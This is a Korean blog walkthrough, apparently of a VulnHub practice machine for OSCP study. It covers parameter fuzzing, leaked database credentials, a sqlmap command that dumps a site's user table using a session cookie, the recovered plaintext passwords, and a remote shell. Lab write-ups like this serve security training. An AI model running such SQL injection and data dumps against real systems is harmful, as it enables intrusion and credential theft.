1. Reconnaissance

 

 

: HTTP Parameter Pollution(HPP)

 

 

: hisotry.php는 빈 페이지

- 혹시 모르니 파라미터 fuzzing

 

: user

 

 

- 테스트

 

확인 완료!

 

 


 

 

 

2. Exploitation

 

 

- admin 조회

 

 

 

- github 확인

 

 

 

- 소스 확인

 

: SQL 계정 정보 확인

root/ sqluserrootpassw0r4

 

 

: system 함수 파라미터 확인

 

 

 

- RCE 시도

 

: 일반 계정으로 시도 시 실행 불가

> admin 계정 비번을 알아야 한다.

 

 

 

- SQL injection

# sqlmap --url 'http://192.168.10.114/history.php?user=admin' --cookie="PHPSESSID=8nsdb4ue0bi7g7hjaju33tjfvd" --dump --batch
 

admin / myadmin#p4szw0r4d

john / Sup3r$S3cr3t$PasSW0RD

 

 

- 다시 RCE 시도

 

성공!

 

 

 

- 쉘

 

: 침투 성공!

 

 

 

 

 

3. Privilege Escalation

 

- John?

john!

 

 

 

728x90
반응형

'OSCP > Vulnahub' 카테고리의 다른 글

[+] Torment  (0) 2023.01.22
[+] Election  (0) 2023.01.22
[+] VENOM  (0) 2023.01.21
[+] DigitalWorld.local : FALL (SSH id_rsa)  (0) 2023.01.21
[+] WinterMute (Pivoting - 중요)*  (0) 2023.01.21

+ Recent posts